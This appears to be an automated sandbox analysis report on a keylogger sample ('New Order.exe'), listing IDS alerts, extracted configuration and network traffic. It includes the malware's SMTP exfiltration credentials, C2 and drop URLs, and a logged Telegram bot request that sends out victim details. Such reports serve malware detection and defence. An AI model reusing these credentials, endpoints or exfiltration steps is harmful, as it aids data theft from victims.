ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.10 - Destination IP: 193.122.130.0

Timestamp:	2024-07-25T18:07:46.780990+0200
SID:	2803274
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.10 - Destination IP: 193.122.130.0

Timestamp:	2024-07-25T18:07:47.921622+0200
SID:	2803274
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.10

Timestamp:	2024-07-25T18:08:02.910607+0200
SID:	2022930
Source Port:	443
Destination Port:	49725
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T18:07:53.278689+0200
SID:	2803305
Source Port:	49717
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T18:07:51.363340+0200
SID:	2803305
Source Port:	49715
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.127.169.103 - Destination IP: 192.168.2.10

Timestamp:	2024-07-25T18:08:23.166150+0200
SID:	2022930
Source Port:	443
Destination Port:	55284
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.10 - Destination IP: 193.122.130.0

Timestamp:	2024-07-25T18:07:45.906002+0200
SID:	2803274
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T18:07:48.538694+0200
SID:	2803305
Source Port:	49711
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.10 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T18:07:54.397092+0200
SID:	2803305
Source Port:	49719
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.127.169.103 - Destination IP: 192.168.2.10

Timestamp:	2024-07-25T18:08:21.566686+0200
SID:	2022930
Source Port:	443
Destination Port:	55283
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	Avira URL Cloud: Label: malware
Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "widi@lenteraandalan.com", "Password": "merah2005", "Host": "mail.lenteraandalan.com\n", "Port": "587"}
Source: 2.2.RegSvcs.exe.5470000.5.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "merah2005", "Password": "mail.lenteraandalan.com\n", "Host": "armkmc2017@gmail.com", "Port": "587"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: New Order.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: New Order.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49708 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49724 version: TLS 1.2

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: New Order.exe, 00000000.00000003.1261900706.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, New Order.exe, 00000000.00000003.1261008069.0000000003D70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: New Order.exe, 00000000.00000003.1261900706.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, New Order.exe, 00000000.00000003.1261008069.0000000003D70000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_0032DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0032DBBE
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002FC2A2 FindFirstFileExW,	0_2_002FC2A2
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_003368EE FindFirstFileW,FindClose,	0_2_003368EE
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_0033698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0033698F
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_0032D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0032D076
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_0032D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0032D3A9
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00339642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00339642
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_0033979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0033979D
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00339B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00339B2B
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_00335C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00335C97

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_02A9E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_069543EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_069557A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_069547DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_069547DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then push 00000000h	2_2_06955532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_06955532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_06954FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_06954B96

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.10:49729 -> 103.163.138.29:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2026/07/2024%20/%2001:41:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 103.163.138.29 103.163.138.29
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic

TCP traffic: 192.168.2.10:49729 -> 103.163.138.29:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49708 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_0033CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0033CE44

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2026/07/2024%20/%2001:41:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.lenteraandalan.com
Source: global traffic	DNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 25 Jul 2024 16:07:58 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://lenteraandalan.com
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.lenteraandalan.com
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20a
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enp
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000040C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3710743916.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB
Source: RegSvcs.exe, 00000002.00000002.3710743916.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/p

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49724 version: TLS 1.2

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_0033EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0033EAFF

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_0033ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0033ED6A

Source: C:\Users\user\Desktop\New Order.exe

0_2_0033EAFF

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_0032AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0032AA57

